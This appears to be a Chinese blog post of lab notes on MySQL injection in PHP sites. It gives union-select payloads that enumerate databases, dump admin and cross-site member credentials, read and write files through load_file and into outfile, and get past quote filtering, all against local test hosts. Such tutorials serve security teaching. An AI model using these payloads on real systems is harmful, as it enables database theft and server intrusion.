SQL注入一 -PHP应用&MYSQL架构&SQL注入&跨库查询&文件读写&权限操作

已于 2024-03-19 00:06:37 修改
阅读量533 收藏
点赞数 1
文章标签: 网络安全
于 2024-03-18 21:46:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zyw268/article/details/136823020
版权
本文详细讨论了PHP与MySQL在Web开发中的应用,包括架构设计、SQL查询技巧,特别是如何进行常规和跨库查询,以及针对SQL注入的安全防范措施,强调了数据库用户管理和单引号过滤的重要性。
摘要由CSDN通过智能技术生成
  • PHP-MYSQL-Web组成架构
  • PHP-MYSQL-SQL常规查询
  • PHP-MYSQL-SQL跨库查询
  • PHP-MYSQL-SQL文件读写

MYSQL注入:(目的获取当前web权限)
1、判断常见四个信息(系统,用户,数据库名,版本)
2、根据四个信息去选择方案
root用户:先测试读写,后测试获取数据
非root用户:直接测试获取数据

#PHP-MYSQL-Web组成架构
服务器安装MYSQL数据库,搭建多个站点,数据库集中存储MYSQL数据库中管理
可以都使用root用户管理也可以创建多个用户进行每个网站对应的数据库管理
1、统一交root用户管理
www.zblog.com  = zblog  = root =>MYSQL
www.demo01.com = demo01 = root =>MYSQL
2、一对一用户管理(推荐)
www.zblog.com  = zblog  = zblog =>MYSQL
www.demo01.com = demo01 = demo01 =>MYSQL

#PHP-MYSQL-SQL常规查询
获取相关数据:
1、数据库版本-看是否符合information_schema查询-version()
2、数据库用户-看是否符合ROOT型注入攻击-user()
3、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os
4、数据库名字-为后期猜解指定数据库下的表,列做准备-database()

MYSQL5.0以上版本:自带的数据库名information_schema
information_schema:存储数据库下的数据库名及表名,列名信息的数据库
information_schema.schemata:记录数据库名信息的表
information_schema.tables:记录表名信息的表
information_schema.columns:记录列名信息表
schema_name:information_schema.schemata记录数据库名信息的列名值
table_schema:information_schema.tables记录数据库名的列名值
table_name:information_schema.tables记录表名的列名值sss
column_name:information_schema.columns记录列名的列名值

order by 6 
union select 1,2,3,4,5,6
union select 1,2,3,database(),user(),6
union select 1,2,3,version(),@@version_compile_os,6
union select 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema='demo01'
union select 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name='admin'
union select 1,2,3,username,password,6 from admin limit 0,1

#PHP-MYSQL-SQL跨库查询
影响条件:当前数据库ROOT用户权限
测试不同数据库用户:root demo
union select 1,2,3,4,group_concat(schema_name),6 from information_schema.schemata
union select 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema='zblog'
union select 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name='zbp_member' and table_schema='zblog'
union select 1,2,3,mem_Name,mem_Password,6 from zblog.zbp_member

#PHP-MYSQL-SQL文件读写
影响条件:
1、当前数据库用户权限
2、secure-file-priv设置
测试不同数据库用户:root demo
union select 1,load_file('d:\\1.txt'),3,4,5,6
union select 1,'xiaodi',3,4,5,6 into outfile 'd:\\2.txt'
读写的路径的问题:
1、报错显示获取路径
2、phpinfo页面泄漏
如果不知道路径思路:
利用常见的默认的中间件,数据库等安装路径读取有价值信息


access无数据库用户

mysql里面有内置的管理用户,其中root就是默认数据库管理员用户
网站上面的数据库都在mysql中,由root或一对一用户去管理

1、数据库统一管理(root用户)
每个网站的数据库都由root用户统一管理
网站A:192.168.1.4:81  D:/phpstudy_pro/WWW/Z-Blog  数据库root用户  zblog
网站B:192.168.1.4:82  D:/phpstudy_pro/WWW/demo01  数据库root用户  demo01

mysql
	root(自带默认)
		网站A  testA
		网站B  testB


2、数据库一对一管理(不同用户)
自己的网站单独创建数据库用户去管理自己的数据库
网站A:192.168.1.4:81  D:/phpstudy_pro/WWW/Z-Blog  数据库zblog用户  zblog
网站B:192.168.1.4:82  D:/phpstudy_pro/WWW/demo01  数据库demo用户  demo01

mysql
	testA用户
		网站A  testA
	testb用户
		网站B  testB


接受的参数值未进行过滤直接带入SQL查询的操作 就是SQL注入产生的原理
攻击:利用SQL语句执行你想要的东西(SQL语句能干嘛,注入就能干嘛)
SQL语句能干嘛 = SQL语句由谁决定 => 数据库类型决定 (为什么mysql注入 oracle注入叫法原因)

http://localhost:63342/demo01/new.php?id=3
select * from news where id=3

http://localhost:63342/demo01/new.php?id=3 union select 1,2,username,password,5,6 from admin
select * from news where id=3 union select 1,2,username,password,5,6 from admin

access注入 sqlmap  靠字典去猜 又可能猜不到表名 列名

mysql
	demo01
		admin
			username,password,id
				数据
	Zblog
		zbp_member
			mem_Name,mem_Password
				数据
Access(单个)
	表名
		列名(字段)
			数据

目的:获取数据
肯定一步步得到信息

查询数据库名demo01下的表名信息(借助information_schema.tables存储查询)
http://192.168.1.4:82/new.php?id=1 union select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema='demo01'

查询数据库名demo01下的表名admin的列名信息(借助information_schema.columns存储查询)
http://192.168.1.4:82/new.php?id=1 union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_schema='demo01' and table_name='admin'

跨库查询:
1、数据库统一管理(root用户)
每个网站的数据库都由root用户统一管理
网站A:192.168.1.4:81  D:/phpstudy_pro/WWW/Z-Blog  数据库root用户  zblog
网站B:192.168.1.4:82  D:/phpstudy_pro/WWW/demo01  数据库root用户  demo01


跨库注入
通过B网站的注入点获取A网站的账号密码

获取mysql下所有数据库名:
http://192.168.1.4:82/new.php?id=1 union select 1,2,3,group_concat(schema_name),5,6 from information_schema.schemata

http://192.168.1.4:82/new.php?id=1 union select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema='zblog'

http://192.168.1.4:82/new.php?id=1 union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_schema='zblog' and table_name='zbp_member'

解决:单引号过滤绕过方式
SQL注入语句中用单引号就不要编码,编码就不用单引号(路径,表名,数据库名等)

爱敲键盘的pig
关注
〖Python 数据库开发实战 - Python与MySQL交互篇②〗- SQL 注入攻击案例
易编橙 · 终身成长社群,相遇已是上上签!
08-22 4万+
上一章节,我们只是简单的了解了 MySQL Connector 的语法,完成了一个简单的案例。Python 语言操作数据库不是到这里就结束了后续还有很多高级的内容等着我们去学习,该章节我们就来学习一下对所有数据库都有效的 "SQL 注入攻击" 。
67.网络安全渗透测试—[SQL注入篇6]—[MySQL+PHP-读写操作]
qwsn
08-31 1940
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、MySQL+PHP 读写操作 1、MySQL特性:`secure_file_priv特性` 2、MySQL+PHP操作 3、windows和linux的常用目录文件 4、MySQL+PHP操作
渗透测试之SQL注入实战练习---Mysql+php注入练习环境
永不垂头的博客
08-06 879
渗透测试之SQL注入实战练习—Mysql+php注入练习环境 渗透测试之SQL注入实战练习 靶机经典案例:Mysql+php注入练习环境(ACTcms,news.php?cid=2&listid=5&newsid=25,可练习outfile,admin/admin,后台上传php4) 方法一:(手工注入) 总共发现4个注入点 第一个listid 第二个 newsid 第三个 cid 第四个 proid 下面笔者将以第一个注入点listid为例展开阐述,详细注入过程如下: ① id后加’,页
SQL 注入:Sqli-labs (1-65通关)、sqlmap、注入常用函数
freeking101的博客
07-26 4452
SQL 注入:Sqli-labs (1-65通关)、sqlmap、注入常用函数
PHP处理mysql注入漏洞原理及方法
未来社会二十年发展的核心技术趋势由ABCD四个字母组成,分别是AI(人工智能)、BlockChain(区块链)、Cloud(云)、和Data(大数据)每一次进步都有新的认知和感触
12-06 864
SQL注入可以造成数据库信息泄露,特别是数据库中存放的用户隐私信息的泄露。通过操作数据库对特定网页进行篡改,修改数据库一些字段的值,嵌入恶意链接,进行挂马攻击,传播恶意软件。服务器还容易被远程控制,被安装后门,经由数据库服务器提供的操作系统支持,让攻击者得以修改或控制操作系统以及破坏硬盘数据,瘫痪全系统。
php+mysql注入环境搭建
土拨鼠挖洞中的博客
04-15 815
php+mysql注入环境搭建需要资料如下: 链接:http://pan.baidu.com/s/1kV746Dx 密码:026d 1.安装phpmystudy 自定义安装好phpmystudy,启动(运行phpmystudy)   2.编程一个注入页面(下载好的sql.php) 在phpmystudy安装路径下WWW目录创建一下文件夹test, 然后把下载好的sql.php复制一份...
php-mysql注入讲解和防御
xkjscm的博客
04-14 610
mysql批量查询漏洞案例 (1) select * from user where id=1; (2)select * from user where id=1 or 1=1; 分析: id=1条件只会查询一条,id=1 or 1=1会查询表中所有数据 示例代码: // 数字注入 // select * from user where id = 1; // 正常需要 // select...
SQL语句执行深入讲解(MySQL架构总览->查询执行流程->SQL解析顺序)
09-09
本文将深入讲解SQL语句在MySQL中的执行过程,包括MySQL架构总览、查询执行流程以及SQL语句的解析顺序。 首先,我们来看MySQL架构总览。MySQL是一个分层的系统,主要分为两个层次:SQL Layer(SQL层)和Storage ...
69.网络安全渗透测试—[SQL注入篇8]—[MySQL+PHP-报错注入读写文件]
qwsn
01-18 2196
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、报错注入-读取文件 1、extractvalue()/exp() 读取文件 二、报错注入-伪写入文件 1、exp()伪写入文件
关于SQL注入文件读写的方法总结
09-09
在实际应用中,应确保数据库服务器和应用程序的安全,包括使用参数化查询、存储过程、输入验证以及限制数据库用户的权限等方式来防御SQL注入攻击。同时,还应定期对数据库进行安全审计和漏洞扫描,及时修补安全漏洞...
使用sqlmap对进行php+mysql注入实战
dfdhxb995397的博客
05-31 489
作者:陈小兵一般来讲一旦网站存在sql注入漏洞,通过sql注入漏洞轻者可以获取数据,严重的将获取webshell以及服务器权限,但在实际漏洞利用和测试过程中,也可能因为服务器配置等情况导致无法获取权限。 1.1php注入点的发现及扫描 1.使用漏洞扫描工具进行漏洞扫描 将目标url地址放在wvs中进行漏洞扫描,如图1所示,扫描结果显示存在SQL盲注和SQL注入,其漏洞存在的...
PHP+MySQL实现简单的登录(SQL注入入门实验)
热门推荐
江左盟的博客
06-03 1万+
本实验是入门级的SQL注入实验,手工注入吧,用sqlmap就没意思了,简单过程:用户输入用户和密码然后提交,服务端收到用户和密码并查询数据库输出到页面。 一、创建数据库 create database web1; 创建两张表,一张保存登录用户和密码,另一张保存flag: create table test(user varchar(15),password varchar(16)); c...
php+mysql注入环境搭建及测试(上)
Rosefinch
07-18 3590
最近在观看小迪的第十三期视频,从里面学到了很多有关渗透方面的知识,弄懂了一些基础的mysql注入原理。同时记录下学习渗透的一些方法。php+mysql注入环境搭建需要资料如下:链接:http://pan.baidu.com/s/1kV746Dx 密码:026d1.安装phpmystudy自定义安装好phpmystudy,启动(运行phpmystudy)2.编程一个注入页面(下载好的sql.php)...
SQL注入系列之PHP+Mysql手动注入(一)----数字型
fendo
01-01 1万+
常见的几种SQL注入 1.数字型 2.字符型 3.文本型 4.搜索型(POST/GET) 5.cookie注入 6.SQL盲注 MySQL报错注入基本流程: Mysql注入步骤 1.判断sql注入 2.猜解表名 3.猜解列名 4.猜解字段内容 5.导出webshell 1.判断sql注入 ○提交单引号' ○and大法和or大法
php操作mysql防止sql注入(合集)
zhouyuqi1的博客
08-31 1万+
本文将从sql注入风险说起,并且比较addslashes、mysql_escape_string、mysql_real_escape_string、mysqli和pdo的预处理的区别。 当一个变量从表单传入到php,需要查询mysql的话,需要进行处理。 举例: $unsafe_variable = $_POST['user_input'];  mysqli_query("INSERT INTO...
SQL注入系列之PHP+Mysql手动注入(三)----搜索型(POST/GET)
fendo
02-26 1万+
一、搜索型注入简介与原理 1)简介 一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在: 2)原理 $sql="select * from user where password like '%$pwd%' order by pa
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8471
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
景区民宿预约系统代码系统 Springboot景区民宿预约系统(程序,中文注释)
最新发布
09-26
景区民宿预约系统-景区民宿预约系统-景区民宿预约系统-景区民宿预约系统-景区民宿预约系统-景区民宿预约系统-景区民宿预约系统-景区民宿预约系统-景区民宿预约系统-景区民宿预约系统-景区民宿预约系统-景区民宿预约系统 1、资源说明:景区民宿预约系统源码,本资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 2、适用人群:计算机相关专业(如计算计、信息安全、大数据、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工等学习者,作为参考资料,进行参考学习使用。 3、资源用途:本资源具有较高的学习借鉴价值,可以作为“参考资料”,注意不是“定制需求”,代码只能作为学习参考,不能完全复制照搬。需要有一定的基础,能够看懂代码,能够自行调试代码,能够自行添加功能修改代码。 4. 最新计算机软件毕业设计选题大全(文章底部有博主联系方式): https://blog.csdn.net/2301_79206800/article/details/135931154 技术栈、环境、工具、软件: ① 系统环境:Windows ② 开发语言:Java ③ 框架:SpringBo
C语言期末题库.zip
09-26
C语言期末题库.zip
PHP经典实例全扫描:斯克拉&切贝特伯格权威指南
4. 文件操作与目录遍历:书中提供大量关于文件上传、读写、目录遍历的示例,帮助开发者更好地管理服务器上的文件系统。 5. 数据库集成:PHP是广泛用于Web开发的语言,书中详细介绍了如何使用PHPMySQL、SQL Server...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值